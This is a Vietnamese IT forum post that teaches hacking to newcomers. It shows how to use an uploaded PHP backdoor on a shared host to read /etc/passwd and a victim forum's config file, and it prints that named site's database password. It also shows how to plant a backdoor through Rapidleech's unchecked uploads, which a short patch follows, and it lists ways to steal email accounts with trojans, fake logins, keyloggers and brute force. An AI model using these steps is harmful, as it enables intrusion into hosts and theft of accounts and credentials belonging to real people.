Chia Sẽ Kinh Nghiệm Về IT



Tìm Kiếm Với Google
-


Gởi Ðề Tài Mới  Gửi trả lời
 
Công Cụ Xếp Bài
Tuổi 09-05-2009, 11:07 AM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Một Số Thủ Thực Hack Forum, Yahoo...
* Hack 4rum:

Chào các bạn , hôm nay mình xin giới thiệu 1 cách hack forum , theo tôi nghĩ nó ở mức nguy hiểm cao , hầu hết các diễn đàn php đều có cơ sở dữ SQL và nội dung bài viết này làm cách nào là đọc file config.php , trong khi họ đã chmod để lấy pass mySQL của victim , sữ dụng phpmyadmin để drop hay đoạt quyền admin diễn đàn . Nếu bạn là 1 hacker tôi nói đến đây là kết thúc bài viết , tôi nghĩ bạn đủ thông minh để hiểu và không nên mất thời gian xem những cái mà mình đã biết rồi . Còn ngược lại bạn chưa hiểu thì chúng ta tiếp tục sang bước tiếp theo nhé .bài viết này dành cho newbie Okie chứ?

Ở đây tôi lấy 1 site vd www.forums.ngoisaonho.info site này mới thành lập chưa có thành viên nên mức độ ảnh hưởng sẽ không cao , cho việc tôi dùng nó để miêu tả 1 bài viết . Bạn dùng 1 công cụ để kiểm tra victim của bạn mua host ở đâu www.checkdomain.com bạn có thể dùng nó ! chúng ta tiếp tục nhé

Bước 1 : Up load backdoor lên host của bạn cùng sever lên host victim .
Tôi dùng remview bạn dùng cái gì thì tuỳ (vào google đánh từ khóa remview để down về . vì có nhiều cách để local . có thể dùng cgitelnet cũng được)
copy đoạn code remview.php
down tại http://www.ktv4vn.com/rem.zip

Bước 2

okie ! up con backdoor này lên host của bạn và chạy nó với link

http://www.localhost.com/remview.php

Có 1 khó khăn cho tôi khi host của victim chmod khả chuẩn khiến tôi không thể view host . Tôi phải đi đường vòng sữ dụng chức năng Shell commands
okie trong Shell commands bạn cho run lệnh

Trích:
cat /etc/passwd;

Trích:
ngoisaon:33217:33218::/home/ngoisaon:/usr/local/cpanel/bin/noshell
Tiếp trong shell commands bạn cho run lệnh

Trích:
cat /etc/userdomains;
Tôi tìm đúng domain của victim như vậy ta có user victim là ngoisaon

Trích:
ngoisaonho.info: ngoisaon
Như phần trên đã nói host victim chmod khá chuẩn nên tôi phải tiếp tục sữ dụng công cụ Shell commands để view host victim
trong Shell commands run lệnh dir với user bạn vừa tìm được như sau:

Trích:
dir /home/victim/public_html/;
thu được:

Trích:
cgi-bin index.htm _private _vti_inf.html _vti_txt
xóa:
Trích:
forums postinfo.html _vti_cnf _vti_pvt welcome
Chạy tiếp lệnh dir để view thư mục forums

Trích:
dir /home/victim/public_html/forums;
thu được:

Trích:
admin.php fonts MBinstall.php style_images
cache html modules uploads
cgi-bin icon_db_hack.php show.php viewsong.php
conf_global.php index.php Skin xoa
conf_mime_types.php install_templates.txt sources
css.php ipchat.php ssi.php
datamusic.sql lang ssi_templates
Cái mà tôi cần view là file conf_global.php run với lện cat như sau :
Trích:
cat /home/victim/public_html/forums/conf_global.php;

Trích:
$INFO['sql_database'] = 'ngoisaon_Forums';
$INFO['sql_driver'] = 'mySQL';
$INFO['sql_host'] = 'localhost';
$INFO['sql_pass'] = 'HANOIMUATHU';
Đến đây bạn đã lấy thấy được user : ngoisaon_Forums và pass là HANOIMUATHU , việc còn lại là dùng nó để vào phpmyadmin của victim , bạn vào phpmyadmin sẽ có rất nhiều cho vui , nên nhớ rằng để người khác vào phpmyadmin của mình điều này còn tệ hơn việc victim bị hack pass admin trong forum , bạn có thể vào phpmyadmin của victim bằng nhiều cách có thể tìm link của victim hay setup phpmyadmin ở host bạn hay sữ dụng 1 tool nào đó để hổ trợ bạn làm việc này .
Hình như remview này mọi người thường dùng http://php.spb.ru/remview/remview_2003_10_23.zip

* Hack Website sử dụng Rapidleech, Rapidkill:

Rapidleech và Rapidkill là 2 script viết bằng PHP, hỗ trợ download file ở rapidshare sang hosting.

Bài viết sẽ dựa trên một sơ hở nhỏ mà Rapidleech, Rapidkill mắc phải đó là không phân biệt loại tập tin được tải vào hosting. Và tui sẽ tận dụng sơ hở đó để tải backdoor = PHP vô

1. Đầu tiên bạn lên google gõ "rapidleech v2.2" hoặc "Rapidkill", sau khi tìm được website nào có sử dụng chúng thì bạn lưu lại.

2. Tiếp đến bạn vào www.rapidshare.de upload 1 con backdoor lên đó, rồi lưu link lại.

3. Mở trang web chứa Rapidleech hoặc Rapidkill mà bạn tìm được ở Bước 1, tìm đến khung nhập URL rapidshare, bạnn nnhập vào link con backdoor ở Bước 2.

4. Như vậy là backdoor đã được upload, giả sử website có link là:
domain.com/rapidleech/

Và backdoor có link là: (Giả sử thôi nha)
rapidshare.de/files/21461115/testtest.php.html

Bạn truy nhập vào backdoor theo đường dẫn:
domain.com/rapidleech/testtest.php

* Cách fix lỗi của Rapidleech, rapidkill tương tự:
Mở file function.php, tìm đoạn:



Code:
fputs($fp,$zapros);
fflush($fp);

Thêm vào bên dưới đoạn:

Code:

$link = strtolower($_GET['link']);
$link = explode(".", $link);

if ( $link[count($link)-2] == "php" )
{
print "Link không hợp lệ.";
exit;
}
Vì cốt lõi cái này nó nhận link ở biến $link nên chỉ cần check ở đấy là ok.

* Hack Mail:

Cach1 :
Hỏi trực tiếp : thật điên rồ .
Cach 2 :
Bạn biết thông tin về người đó ,vậy hãy nhỡ yahoo giúp đỡ.Cách này trược kia có thể thực hiện được nhưng bây giờ yahoo không cho request.
Cach 3 :
Sử dụng virut-trojan. đây là cách hay sử dụng nhất của hacker.Có rất nhiều bài viết hướng dẫn các bạn hãy tự tham khảo.Có hàng trăm virut trojan cho bạn lựa chọn tùy bạn thui.
Cach 4 :
Sử dụng các chương trình crack(bẻ )
ví dụ yahoomail thì có:crackpassyahoo
hotmail thì có :crack passhotmail.
Cach 5 :
Sử dụng các chương trình fake( bẫy lỗi) như fake login, giả giao diện mail.......
Cach 6 :Bạn có một website tại sao không sử dụng Godwill gắn chúng vô web .
Cach 7 : Nếu ở dịch vụ bạn đang ngồi có thể sử dụng keylogger 5.04,perfecf keyloggerv1.47, starrcmd........rất nhiều.
Cach 8 : Tấn công phê chuẩn đầu vào .
với cách này bạn có thể vào mail mà không cần đăng nhập .Thật bất ngờ khi vào mà không cần biết pass hì.
Cach 9 :

Lỗi đơn giản lắm password yahoo bị mắc lỗi default password
" yahoo***"
vậy *** ở đây là gì đơn giản là 3 con số những số này nằm trong khoảng từ 0-->999 việc brute chở nên dễ dàng rồi.............
Tuy nhiên big problem nằm ở chỗ nếu hì hục nghiên cứu làm sao modify info ngay tại yahoo thì có vẻ như không được ổn . Nhớ rằng yahoo là reseller của INWW việc chúng ta cần làm là nhào vô cái Registry key để lấy info sau đó quay ra inww.com để change infor
Chúc các bạn thành công.
Sưu tập on net
  Trả lời ngay kèm theo trích dẫn này
Gửi trả lời


Công Cụ
Xếp Bài

Quyền Hạn Của Bạn
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Mở
Hình Cảm xúc đang Mở
[IMG] đang Mở
Mã HTML đang Tắt




Bây giờ là 05:37 AM. Giờ GMT +7



Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.